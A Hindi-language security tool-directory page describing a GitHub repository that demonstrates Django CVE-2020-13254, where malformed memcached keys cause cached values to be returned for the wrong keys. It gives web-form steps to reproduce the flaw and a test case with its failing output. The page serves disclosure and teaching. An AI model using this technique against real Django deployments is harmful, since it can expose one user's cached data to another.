Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
django-cve-2020-13254 — Django CVE-2020-13254 के लिए भेद्यता प्रदर्शन | Kitploit
उपकरण/GitHubGitHub/danpalmer/django-cve-2020-13254
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubdanpalmer/django-cve-2020-13254

django-cve-2020-13254

Django CVE-2020-13254 के लिए भेद्यता प्रदर्शन

रिपॉजिटरी देखें
2126 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Django CVE-2020-13254

यह रिपॉजिटरी CVE-2020-13254 के शोषण को दो तरीकों से प्रदर्शित करती है – एक वेब इंटरफ़ेस के माध्यम से और एक असफल परीक्षण मामले के माध्यम से।

अधिक जानकारी के लिए देखें:

https://danpalmer.me/2020-06-07-django-memcache-vulnerability/

वेब के माध्यम से शोषण

उदाहरण 2 फ़ॉर्म वाला एक वेब इंटरफ़ेस प्रदान करता है, एक जो कैश में मान सेट करता है और दूसरा जो उन्हें प्राप्त करता है। ये सीधे Django कैश बैकएंड के कॉल में अनुवादित होते हैं। चूंकि कोडबेस कोई सत्र या प्रमाणीकरण प्रणाली लागू नहीं करता है, एक ही ब्राउज़र टैब में कई उपयोग मशीनों के बीच कई उपयोगकर्ताओं से अप्रभेद्य हैं।

शोषण करने के लिए:

  1. A और B की कुंजियों को मान a और b पर सेट करें।
  2. C D को मान c d पर सेट करने का प्रयास करें। यह त्रुटि देगा।
  3. कुंजी A को पुनर्प्राप्त करने का प्रयास करें, गलत तरीके से कोई परिणाम नहीं होगा।
  4. कुंजी B को पुनर्प्राप्त करने का प्रयास करें, परिणाम गलत तरीके से a होगा।

परीक्षणों के माध्यम से डेमो

इस प्रक्रिया को एक परीक्षण मामले के रूप में इस प्रकार व्यक्त किया जा सकता है:

root@kitploit:~
from django.core.cache import cache
from django.test import TestCase


class CacheTests(TestCase):
    def test_cache(self):
        cache.set('k1', 'v1')
        cache.set('k2', 'v2')
        try:
            cache.set('a b', 'v3')
        except Exception:
            pass
        self.assertEqual(
            [
              cache.get(x) for x in
              ['k2', 'k1', 'k2', 'k1', 'k2', 'k1']
            ],
            ['v2', 'v1', 'v2', 'v1', 'v2', 'v1'],
        )

यह निम्नलिखित त्रुटि के साथ विफल होता है:

root@kitploit:~
=============================================================
FAIL: test_cache (demo.tests.CacheTests)
-------------------------------------------------------------
Traceback (most recent call last):
  File "tests.py", line 30, in test_cache
    'v1',
AssertionError: Lists differ

First differing element 0:
None
'v2'

- [None, 'v2', 'v1', 'v2', 'v1', 'v2']
?  ------

+ ['v2', 'v1', 'v2', 'v1', 'v2', 'v1']
?                              ++++++

-------------------------------------------------------------

set के बाद, लौटाए जा रहे कैश परिणाम किए जा रहे प्रश्नों से मेल नहीं खाते हैं।

टूल डाउनलोड करें